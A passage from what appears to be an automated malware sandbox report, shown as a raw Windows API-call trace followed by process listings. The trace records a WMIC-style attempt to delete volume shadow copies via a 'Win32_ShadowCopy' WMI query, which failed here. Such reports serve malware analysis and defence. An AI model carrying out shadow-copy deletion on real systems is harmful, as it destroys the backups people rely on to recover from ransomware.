(Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0107.219] free (_Block=0x2852448) [0107.219] CloseHandle (hObject=0x298) returned 1 [0107.219] lstrlenW (lpString="GET") returned 3 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.219] lstrlenW (lpString="LIST") returned 4 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.219] lstrlenW (lpString="SET") returned 3 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.219] lstrlenW (lpString="CALL") returned 4 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0107.219] lstrlenW (lpString="ASSOC") returned 5 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.219] lstrlenW (lpString="CREATE") returned 6 [0107.219] lstrlenW (lpString="delEte") returned 6 [0107.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.220] lstrlenW (lpString="DELETE") returned 6 [0107.220] lstrlenW (lpString="delEte") returned 6 [0107.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0107.227] malloc (_Size=0xc) returned 0x2852078 [0107.227] lstrlenA (lpString="") returned 0 [0107.227] malloc (_Size=0x2) returned 0x572860 [0107.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d26a2, cbMultiByte=-1, lpWideCharStr=0x572860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.227] free (_Block=0x572860) [0107.227] malloc (_Size=0xc) returned 0x28520c0 [0107.227] lstrlenA (lpString="") returned 0 [0107.227] malloc (_Size=0x2) returned 0x572860 [0107.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d26a2, cbMultiByte=-1, lpWideCharStr=0x572860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.227] free (_Block=0x572860) [0107.227] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.227] malloc (_Size=0x3e) returned 0x57ff68 [0107.227] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.227] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xdacfcd5 | out: _String="Select", _Context=0xdacfcd5) returned="Select" [0107.227] malloc (_Size=0xc) returned 0x2852168 [0107.228] free (_Block=0x28520c0) [0107.228] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfcd5 | out: _String=0x0, _Context=0xdacfcd5) returned="*" [0107.228] lstrlenW (lpString="FROM") returned 4 [0107.228] lstrlenW (lpString="*") returned 1 [0107.228] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0107.228] malloc (_Size=0xc) returned 0x28520c0 [0107.228] free (_Block=0x2852168) [0107.228] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfcd5 | out: _String=0x0, _Context=0xdacfcd5) returned="from" [0107.228] lstrlenW (lpString="FROM") returned 4 [0107.228] lstrlenW (lpString="from") returned 4 [0107.228] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0107.228] malloc (_Size=0xc) returned 0x2852168 [0107.228] free (_Block=0x28520c0) [0107.228] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfcd5 | out: _String=0x0, _Context=0xdacfcd5) returned="Win32_ShadowCopy" [0107.229] malloc (_Size=0xc) returned 0x28520c0 [0107.229] free (_Block=0x2852168) [0107.229] free (_Block=0x57ff68) [0107.229] malloc (_Size=0xc) returned 0x2852168 [0107.229] malloc (_Size=0xc) returned 0x28520a8 [0107.229] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0107.229] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0107.229] free (_Block=0x2852078) [0107.229] free (_Block=0x2852168) [0107.229] ??0CHString@@QAE@XZ () returned 0x25f82c [0107.229] GetCurrentThreadId () returned 0x79c [0107.229] malloc (_Size=0xc) returned 0x2852168 [0107.230] malloc (_Size=0xc) returned 0x2852078 [0107.230] malloc (_Size=0xc) returned 0x2852108 [0107.230] malloc (_Size=0xc) returned 0x2852120 [0107.230] malloc (_Size=0xc) returned 0x2852138 [0107.230] SysStringLen (param_1="\\\\") returned 0x2 [0107.230] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0107.230] malloc (_Size=0xc) returned 0x2852150 [0107.230] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0107.230] SysStringLen (param_1="\\") returned 0x1 [0107.230] malloc (_Size=0xc) returned 0x2852180 [0107.230] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0107.230] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0107.231] free (_Block=0x2852150) [0107.231] free (_Block=0x2852138) [0107.231] free (_Block=0x2852120) [0107.231] free (_Block=0x2852108) [0107.231] free (_Block=0x2852078) [0107.231] free (_Block=0x2852168) [0107.231] malloc (_Size=0xc) returned 0x2852168 [0107.231] malloc (_Size=0xc) returned 0x2852078 [0107.231] malloc (_Size=0xc) returned 0x2852108 [0107.231] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f0828, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x71c204 | out: ppNamespace=0x71c204*=0x5fd0bc) returned 0x0 [0107.239] free (_Block=0x2852108) [0107.239] free (_Block=0x2852078) [0107.239] free (_Block=0x2852168) [0107.239] CoSetProxyBlanket (pProxy=0x5fd0bc, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0107.240] free (_Block=0x2852180) [0107.240] ??1CHString@@QAE@XZ () returned 0x752e0504 [0107.240] ??0CHString@@QAE@XZ () returned 0x25f824 [0107.240] GetCurrentThreadId () returned 0x79c [0107.240] malloc (_Size=0xc) returned 0x2852180 [0107.240] lstrlenA (lpString="") returned 0 [0107.240] malloc (_Size=0x2) returned 0x572860 [0107.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d26a2, cbMultiByte=-1, lpWideCharStr=0x572860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.240] free (_Block=0x572860) [0107.240] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0107.240] SysStringLen (param_1="") returned 0x0 [0107.240] free (_Block=0x2852180) [0107.241] malloc (_Size=0xc) returned 0x2852180 [0107.241] IWbemServices:ExecQuery (in: This=0x5fd0bc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x25f820 | out: ppEnum=0x25f820*=0x0) returned 0x80041014 [0116.377] free (_Block=0x2852180) [0116.377] _CxxThrowException () [0116.378] malloc (_Size=0x10) returned 0x2852180 [0116.378] ??1CHString@@QAE@XZ () returned 0x752e0504 [0116.378] free (_Block=0x28520c0) [0116.378] free (_Block=0x28520a8) [0116.378] GetCurrentThreadId () returned 0x79c [0116.378] ??0CHString@@QAE@PBG@Z () returned 0x25f8e4 [0116.378] ??YCHString@@QAEABV0@PBG@Z () returned 0x25f8e4 [0116.378] ??0CHString@@QAE@XZ () returned 0x25f7a8 [0116.378] malloc (_Size=0xc) returned 0x28520a8 [0116.378] malloc (_Size=0xc) returned 0x28520c0 [0116.378] SysStringLen (param_1="") returned 0x0 [0116.379] free (_Block=0x28520a8) [0116.379] CoCreateInstance (in: rclsid=0x6d6cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d6c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x71c21c | out: ppv=0x71c21c*=0x5f0810) returned 0x0 [0116.384] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x5f0810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x25f7c0 | out: MessageText=0x25f7c0*="Initialization failure\r\n") returned 0x0 [0116.387] free (_Block=0x28520c0) [0116.387] malloc (_Size=0xc) returned 0x28520c0 [0116.388] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x5f0810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x25f7e4 | out: MessageText=0x25f7e4*="WMI") returned 0x0 [0116.389] malloc (_Size=0xc) returned 0x28520a8 [0116.389] lstrlenW (lpString="WMI") returned 3 [0116.389] lstrlenW (lpString="Wbem") returned 4 [0116.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0116.389] lstrlenW (lpString="WMI") returned 3 [0116.389] lstrlenW (lpString="WMI") returned 3 [0116.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0116.389] WbemStatusCodeText:IUnknown:Release (This=0x5f0810) returned 0x0 [0116.389] ??1CHString@@QAE@XZ () returned 0x752e0504 [0116.389] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x25f010, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0116.389] FormatMessageW (in: dwFlags=0x2500, lpSource=0x25f010, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x25f00c, nSize=0x0, Arguments=0x25eff8 | out: lpBuffer="晨1ERROR:\r\nDescription = %1") returned 0x2e [0116.390] malloc (_Size=0xc) returned 0x2852168 [0116.390] LocalFree (hMem=0x316668) returned 0x0 [0116.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0116.390] malloc (_Size=0x2f) returned 0x2852448 [0116.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x2852448, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0116.390] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 46 [0116.394] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned 0 [0116.394] free (_Block=0x2852448) [0116.394] free (_Block=0x2852168) [0116.394] free (_Block=0x28520a8) [0116.394] free (_Block=0x28520c0) [0116.394] ??1CHString@@QAE@XZ () returned 0x1 [0116.394] ??0CHString@@QAE@PBG@Z () returned 0x25f904 [0116.394] ??YCHString@@QAEABV0@PBG@Z () returned 0x25f904 [0116.394] GetCurrentThreadId () returned 0x79c [0116.394] ??1CHString@@QAE@XZ () returned 0x1 [0116.394] WbemLocator:IUnknown:Release (This=0x5fd0bc) returned 0x0 [0116.396] ?Empty@CHString@@QAEXXZ () returned 0x752e0504 [0116.396] free (_Block=0x2852180) [0116.398] _kbhit () returned 0x0 [0116.402] free (_Block=0x573228) [0116.402] free (_Block=0x2852060) [0116.402] free (_Block=0x57fe88) [0116.402] free (_Block=0x57fe70) [0116.403] free (_Block=0x57fe58) [0116.403] free (_Block=0x5731c8) [0116.403] free (_Block=0x57eb88) [0116.403] free (_Block=0x57ff30) [0116.403] free (_Block=0x28520d8) [0116.403] free (_Block=0x57feb0) [0116.403] free (_Block=0x28520f0) [0116.403] free (_Block=0x57ebc8) [0116.403] free (_Block=0x57ff20) [0116.403] free (_Block=0x572ee0) [0116.403] free (_Block=0x57fef8) [0116.403] ?Empty@CHString@@QAEXXZ () returned 0x752e0504 [0116.403] free (_Block=0x5731f8) [0116.403] free (_Block=0x57eba8) [0116.403] free (_Block=0x2852090) [0116.403] free (_Block=0x572788) [0116.403] free (_Block=0x5727d0) [0116.403] free (_Block=0x572818) [0116.403] free (_Block=0x57ebe8) [0116.403] free (_Block=0x5728c8) [0116.403] free (_Block=0x572ec8) [0116.404] free (_Block=0x57e8c8) [0116.404] free (_Block=0x572eb0) [0116.404] free (_Block=0x57e8a8) [0116.404] free (_Block=0x572e98) [0116.404] free (_Block=0x57e888) [0116.404] free (_Block=0x572a10) [0116.404] free (_Block=0x572a28) [0116.404] free (_Block=0x5729d8) [0116.404] free (_Block=0x5729f0) [0116.404] free (_Block=0x572a48) [0116.404] free (_Block=0x572a60) [0116.404] free (_Block=0x572a80) [0116.404] free (_Block=0x57e868) [0116.404] free (_Block=0x572968) [0116.404] free (_Block=0x572980) [0116.405] free (_Block=0x572930) [0116.405] free (_Block=0x572948) [0116.405] free (_Block=0x5729a0) [0116.405] free (_Block=0x5729b8) [0116.405] free (_Block=0x5728f8) [0116.405] free (_Block=0x572910) [0116.405] free (_Block=0x572880) [0116.405] free (_Block=0x573fb8) [0116.405] free (_Block=0x28505b0) [0116.405] WbemLocator:IUnknown:Release (This=0x5f0828) returned 0x2 [0116.405] WbemLocator:IUnknown:Release (This=0x5fd064) returned 0x0 [0116.406] WbemLocator:IUnknown:Release (This=0x5fd00c) returned 0x0 [0116.408] WbemLocator:IUnknown:Release (This=0x5f0828) returned 0x1 [0116.408] ?Empty@CHString@@QAEXXZ () returned 0x752e0504 [0116.408] WbemLocator:IUnknown:Release (This=0x5f0828) returned 0x0 [0116.408] free (_Block=0x57fdf8) [0116.408] free (_Block=0x57fe10) [0116.408] free (_Block=0x57eb48) [0116.408] free (_Block=0x57fe28) [0116.408] free (_Block=0x57fe40) [0116.408] free (_Block=0x57eb68) [0116.409] free (_Block=0x57fcd8) [0116.409] free (_Block=0x57fcf0) [0116.409] free (_Block=0x57ea88) [0116.409] free (_Block=0x57fd08) [0116.409] free (_Block=0x57fd20) [0116.409] free (_Block=0x57eaa8) [0116.409] free (_Block=0x57fc78) [0116.409] free (_Block=0x57fc90) [0116.409] free (_Block=0x57ea48) [0116.409] free (_Block=0x57fca8) [0116.409] free (_Block=0x57fcc0) [0116.409] free (_Block=0x57ea68) [0116.409] free (_Block=0x57fd98) [0116.410] free (_Block=0x57fdb0) [0116.410] free (_Block=0x57eb08) [0116.410] free (_Block=0x57fdc8) [0116.410] free (_Block=0x57fde0) [0116.410] free (_Block=0x57eb28) [0116.410] free (_Block=0x57fc18) [0116.410] free (_Block=0x57fc30) [0116.410] free (_Block=0x57ea08) [0116.410] free (_Block=0x57fc48) [0116.410] free (_Block=0x57fc60) [0116.410] free (_Block=0x57ea28) [0116.410] free (_Block=0x57fd38) [0116.410] free (_Block=0x57fd50) [0116.410] free (_Block=0x57eac8) [0116.410] free (_Block=0x57fd68) [0116.411] free (_Block=0x57fd80) [0116.411] free (_Block=0x57eae8) [0116.411] free (_Block=0x57fb88) [0116.411] free (_Block=0x57fba0) [0116.411] free (_Block=0x57e9a8) [0116.411] free (_Block=0x573160) [0116.411] free (_Block=0x573178) [0116.411] free (_Block=0x57e908) [0116.411] free (_Block=0x572f28) [0116.411] free (_Block=0x572f40) [0116.411] free (_Block=0x57e8e8) [0116.411] free (_Block=0x57faf8) [0116.411] free (_Block=0x57fb10) [0116.411] free (_Block=0x57e948) [0116.411] free (_Block=0x57fbb8) [0116.412] free (_Block=0x57fbd0) [0116.412] free (_Block=0x57e9c8) [0116.412] free (_Block=0x57fac8) [0116.412] free (_Block=0x57fae0) [0116.412] free (_Block=0x57e928) [0116.412] free (_Block=0x57fb28) [0116.412] free (_Block=0x57fb40) [0116.412] free (_Block=0x57e968) [0116.412] free (_Block=0x57fb58) [0116.412] free (_Block=0x57fb70) [0116.412] free (_Block=0x57e988) [0116.412] free (_Block=0x57fbe8) [0116.412] free (_Block=0x57fc00) [0116.412] free (_Block=0x57e9e8) [0116.412] CoUninitialize () [0116.639] exit (_Code=-2147217388) [0116.639] free (_Block=0x573190) [0116.639] free (_Block=0x573e88) [0116.640] ??1CHString@@QAE@XZ () returned 0x752e0504 [0116.640] free (_Block=0x573000) [0116.640] free (_Block=0x5728e8) [0116.640] free (_Block=0x573e68) [0116.640] free (_Block=0x573e48) [0116.640] free (_Block=0x573e18) [0116.640] free (_Block=0x573df8) [0116.640] free (_Block=0x573dc8) [0116.640] free (_Block=0x5713d8) [0116.640] free (_Block=0x5713b8) [0116.640] ??1CHString@@QAE@XZ () returned 0x752e0504 [0116.640] free (_Block=0x572f58) Thread: id = 8 os_tid = 0x15c Thread: id = 9 os_tid = 0x414 Thread: id = 10 os_tid = 0x798 Thread: id = 11 os_tid = 0x40c Thread: id = 12 os_tid = 0x3b4 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 13 os_tid = 0x5f4 Thread: id = 14 os_tid = 0xa98 Thread: id = 15 os_tid = 0xaac Thread: id = 16 os_tid = 0xae4 Thread: id = 17 os_tid = 0xb0 Thread: id = 18 os_tid = 0xb28 Thread: id = 19 os_tid = 0xb2c Thread: id = 20 os_tid = 0xb54 Thread: id = 21 os_tid = 0xba0 Thread: id = 22 os_tid = 0xb9c Thread: id = 23 os_tid = 0x7e8 Thread: id = 24 os_tid = 0x788 Thread: id = 25 os_tid = 0x790 Thread: id = 26 os_tid = 0x320 Thread: id = 27 os_tid = 0x6cc Thread: id = 28 os_tid = 0x42c Thread: id = 29 os_tid = 0x1e4 Thread: id = 30 os_tid = 0x760 Thread: id = 31 os_tid = 0x75c Thread: id = 32 os_tid = 0x74c Thread: id = 33 os_tid = 0x710 Thread: id = 34 os_tid = 0x6d0 Thread: id = 35 os_tid = 0x6bc Thread: id = 36 os_tid = 0x6b8 Thread: id = 37 os_tid = 0x6b0 Thread: id = 38 os_tid = 0x6a8 Thread: id = 39 os_tid = 0x69c Thread: id = 40 os_tid = 0x698 Thread: id = 41 os_tid = 0x688 Thread: id = 42 os_tid = 0x684 Thread: id = 43 os_tid = 0x678 Thread: id = 44 os_tid = 0x4a8 Thread: id = 45 os_tid = 0x46c Thread: id = 46 os_tid = 0x44c Thread: id = 47 os_tid = 0x424 Thread: id = 48 os_tid = 0x420 Thread: id = 49 os_tid = 0x41c Thread: id = 50 os_tid = 0x404 Thread: id = 51 os_tid = 0x14c Thread: id = 52 os_tid = 0x158 Thread: id = 53 os_tid = 0x3fc Thread: id = 54 os_tid = 0x3f4 Thread: id = 55 os_tid = 0x3e8 Thread: id = 56 os_tid = 0x39c Thread: id = 57 os_tid = 0x390 Thread: id = 58 os_tid = 0x38c Thread: id = 59 os_tid = 0x388 Thread: id = 60 os_tid = 0x37c Thread: id = 61 os_tid = 0x374 Thread: id = 81 os_tid = 0x7dc Thread: id = 82 os_tid = 0x570 Thread: id = 83 os_tid = 0x544 Thread: id = 84 os_tid = 0x6ec Thread: id = 85 os_tid = 0x6a4 Thread: id = 103 os_tid = 0xb68 Thread: id = 104 os_tid = 0xba4 Thread: id = 105 os_tid = 0xb58 Thread: id = 106 os_tid = 0x618 Thread: id = 107 os_tid = 0x174 Thread: id = 108 os_tid = 0xa24 Thread: id = 109 os_tid = 0xaa4 Thread: id = 110 os_tid = 0xaa8 Thread: id = 111 os_tid = 0x5e4 Thread: id = 112 os_tid = 0xb9c Thread: id = 113 os_tid = 0xb2c Thread: id = 114 os_tid = 0x74c Thread: id = 116 os_tid = 0x6ec Thread: id = 117 os_tid = 0x6a4 Thread: id = 118 os_tid = 0x6b8 Thread: id = 119 os_tid = 0x500 Thread: id = 120 os_tid = 0x6cc Thread: id = 121 os_tid = 0x68c Thread: id = 122 os_tid = 0x7e0 Thread: id = 123 os_tid = 0x124 Thread: id = 132 os_tid = 0x614 Thread: id = 154 os_tid = 0x9c4 Thread: id = 161 os_tid = 0xae0 Thread: id = 162 os_tid = 0xaf8 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5fe6b000" os_pid = "0xa54" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004372f" [0xc000000f] Thread: id = 62 os_tid = 0xa9c Thread: id = 63 os_tid = 0xa7c Thread: id = 64 os_tid = 0xa74 Thread: id = 65 os_tid = 0xa70 Thread: id = 66 os_tid = 0xa6c Thread: id = 67 os_tid = 0xa68 Thread: id = 68 os_tid = 0xa64 Thread: id = 69 os_tid = 0xa60 Thread: id = 70 os_tid = 0xa5c Thread: id = 71 os_tid = 0xa58 Thread: id = 102 os_tid = 0xb3c Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x60c66000" os_pid = "0xa28" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 72 os_tid = 0xb40 Thread: id = 73 os_tid = 0xa48 Thread: id = 74 os_tid = 0xa44 Thread: id = 75 os_tid = 0xa40 Thread: id = 76 os_tid = 0xa3c Thread: id = 77 os_tid = 0xa38 Thread: id = 78 os_tid = 0xa34 Thread: id = 79 os_tid = 0xa30 Thread: id = 80 os_tid = 0xa2c Thread: id = 133 os_tid = 0x690 Thread: id = 163 os_tid = 0xb1c Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x3df8f000" os_pid = "0x20c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0005cd9f" [0xc000000f] Thread: id = 86 os_tid = 0x7c4 Thread: id = 87 os_tid = 0x364 Thread: id = 88 os_tid = 0x43c Thread: id = 89 os_tid = 0x80c Thread: id = 90 os_tid = 0x81c Thread: id = 91 os_tid = 0x82c Thread: id = 92 os_tid = 0x83c Thread: id = 101 os_tid = 0xb60 Process: id = "8" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x59142000" os_pid = "0x84c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005d61c" [0xc000000f], 